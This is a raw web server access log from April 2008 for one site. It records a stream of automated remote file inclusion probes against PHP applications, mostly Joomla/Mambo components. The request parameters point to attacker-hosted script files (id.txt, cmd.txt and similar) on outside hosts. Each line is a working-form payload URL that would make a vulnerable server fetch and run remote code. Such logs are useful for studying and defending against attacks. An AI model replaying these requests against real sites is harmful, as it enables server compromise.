74.86.192.2 - - [30/Apr/2008:10:12:42 -0700] "GET /logs/styles/internal/header.php?tpl_pgb_moddir=http://glycol.ca/languages/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.42.133.2 - - [30/Apr/2008:10:12:42 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.86.192.2 - - [30/Apr/2008:10:12:42 -0700] "GET /styles/internal/header.php?tpl_pgb_moddir=http://glycol.ca/languages/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.42.133.2 - - [30/Apr/2008:10:12:42 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:10:13:18 -0700] "GET /logs/access.log//index.php?sayfa=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:10:13:22 -0700] "GET //index.php?sayfa=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:10:13:23 -0700] "GET /logs//index.php?sayfa=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:13:24 -0700] "GET /logs/access_071229.log/index.php?table=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:10:13:27 -0700] "GET /logs/access_080201.log/claroline/inc/claro_init_header.inc.php?includePath=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:10:13:27 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.139.67.2 - - [30/Apr/2008:10:13:27 -0700] "GET /Mailer.class.php?mosConfig_absolute_path=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:10:13:28 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.139.67.2 - - [30/Apr/2008:10:13:28 -0700] "GET /logs/Mailer.class.php?mosConfig_absolute_path=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:13:29 -0700] "GET /logs/index.php?table=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:13:31 -0700] "GET /index.php?table=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:13:37 -0700] "GET /logs/access_071229.log/index.php?table=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:13:42 -0700] "GET /logs/index.php?table=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:13:43 -0700] "GET /index.php?table=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
213.27.209.11 - - [30/Apr/2008:10:14:17 -0700] "GET /logs//ashnews.php?pathtoashnews=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.27.209.11 - - [30/Apr/2008:10:14:17 -0700] "GET //ashnews.php?pathtoashnews=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.8.53 - - [30/Apr/2008:10:14:20 -0700] "GET /logs/access_080324.log//atom.php5?page=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.66.235.206 - - [30/Apr/2008:10:14:22 -0700] "GET /includeshttp://www.gegio.it/spscanid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
201.130.79.61 - - [30/Apr/2008:10:14:33 -0700] "GET /logs/access_080117.log/!scanhttp://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.61 - - [30/Apr/2008:10:14:33 -0700] "GET /!scanhttp://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.61 - - [30/Apr/2008:10:14:33 -0700] "GET /logs/!scanhttp://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.1.215.164 - - [30/Apr/2008:10:14:51 -0700] "GET /logs/access_080221.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.dmulk.com"
82.179.164.134 - - [30/Apr/2008:10:14:55 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.179.164.134 - - [30/Apr/2008:10:14:55 -0700] "GET //ashnews.php?pathtoashnews=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.61 - - [30/Apr/2008:10:14:59 -0700] "GET /logs/access_080211.log/!scanhttp://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:10:15:42 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:10:15:42 -0700] "GET /index2.php?mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
198.66.235.206 - - [30/Apr/2008:10:15:58 -0700] "GET /logs/access_080211.log/includeshttp://www.gegio.it/spscanid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
198.66.235.206 - - [30/Apr/2008:10:15:58 -0700] "GET /logs/includeshttp://www.gegio.it/spscanid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
198.66.235.206 - - [30/Apr/2008:10:15:58 -0700] "GET /logs/access_080117.log/includeshttp://www.gegio.it/spscanid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
198.66.235.206 - - [30/Apr/2008:10:15:58 -0700] "GET /logs/access_080228.log/includeshttp://www.gegio.it/spscanid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:10:16:11 -0700] "GET /logs/access_080228.log//components/com_simpleboard/image_upload.php?sbp=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:10:16:15 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:10:16:19 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.29.226 - - [30/Apr/2008:10:16:36 -0700] "GET /logs/access_080315.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:10:16:45 -0700] "GET /administrator/index3.php?mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:10:16:45 -0700] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
88.80.202.91 - - [30/Apr/2008:10:16:55 -0700] "GET /logs/display.php?table=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.202.91 - - [30/Apr/2008:10:16:56 -0700] "GET /display.php?table=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.192.249 - - [30/Apr/2008:10:17:52 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.192.249 - - [30/Apr/2008:10:17:52 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.241.172.8 - - [30/Apr/2008:10:18:33 -0700] "GET /logs/access_080129.log//plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.104.25 - - [30/Apr/2008:10:18:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
216.139.67.2 - - [30/Apr/2008:10:18:42 -0700] "GET /logs/display.php?table=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
216.139.67.2 - - [30/Apr/2008:10:18:42 -0700] "GET /display.php?table=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
65.55.104.25 - - [30/Apr/2008:10:18:43 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.221.91.28 - - [30/Apr/2008:10:19:13 -0700] "GET /logs/access_071219.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [30/Apr/2008:10:19:13 -0700] "GET /errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [30/Apr/2008:10:19:13 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:19:14 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:19:14 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:10:19:14 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:10:19:57 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:10:20:00 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:10:20:04 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:10:20:18 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.103.159.159 - - [30/Apr/2008:10:21:25 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:21:42 -0700] "GET /logs/access_080302.log//agendax/addevent.inc.php?agendax_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:10:22:09 -0700] "GET /logs/access_080215.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:10:22:21 -0700] "GET /logs//calendar.php?l=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:10:22:22 -0700] "GET //calendar.php?l=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:22:38 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [30/Apr/2008:10:22:54 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:23:12 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.221.91.28 - - [30/Apr/2008:10:23:19 -0700] "GET /logs/access_071224.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:23:33 -0700] "GET /logs/access_080308.log/index.php?redir=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:23:35 -0700] "GET /index.php?redir=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:23:35 -0700] "GET /logs/index.php?redir=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:10:23:51 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:23:51 -0700] "GET /logs/access_080308.log/index.php?redir=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:23:52 -0700] "GET /index.php?redir=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:23:53 -0700] "GET /logs/index.php?redir=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:10:23:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:10:23:57 -0700] "GET /logs/access_080130.log//agendax/addevent.inc.php?agendax_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:10:23:58 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:24:07 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:10:24:16 -0700] "GET /logs/access_080220.log/phphtml.php?htmlclass_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:10:24:20 -0700] "GET /phphtml.php?htmlclass_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:10:24:23 -0700] "GET /logs/phphtml.php?htmlclass_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:24:28 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:24:55 -0700] "GET /logs/access_080315.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:24:55 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:24:55 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:25:00 -0700] "GET /index.php?redir=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.223.226.77 - - [30/Apr/2008:10:25:03 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [30/Apr/2008:10:25:03 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [30/Apr/2008:10:25:03 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:10:25:03 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:10:25:03 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:10:25:03 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.223.226.77 - - [30/Apr/2008:10:25:03 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:10:25:04 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:25:04 -0700] "GET /logs/index.php?redir=http://www.brokencomplex.com/phpBB/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:25:05 -0700] "GET /index.php?redir=http://www.brokencomplex.com/phpBB/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:10:25:08 -0700] "GET /logs/access_071226.log//calendar.php?l=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:10:25:08 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:10:25:09 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:10:25:09 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:10:25:11 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.205.214.163 - - [30/Apr/2008:10:25:22 -0700] "GET /logs//errors.php?error=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.223.226.77 - - [30/Apr/2008:10:25:22 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [30/Apr/2008:10:25:22 -0700] "GET //Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [30/Apr/2008:10:25:22 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.205.214.163 - - [30/Apr/2008:10:25:22 -0700] "GET //errors.php?error=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:25:24 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:25:24 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:25:24 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:25:25 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:10:25:26 -0700] "GET /logs/access_080215.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:10:25:33 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:10:25:38 -0700] "GET /index.php?option=com_custompages&cpage=http://rpkns.com/media/idnews.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:25:39 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:10:25:40 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:10:25:40 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:10:25:40 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:10:25:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:10:25:42 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
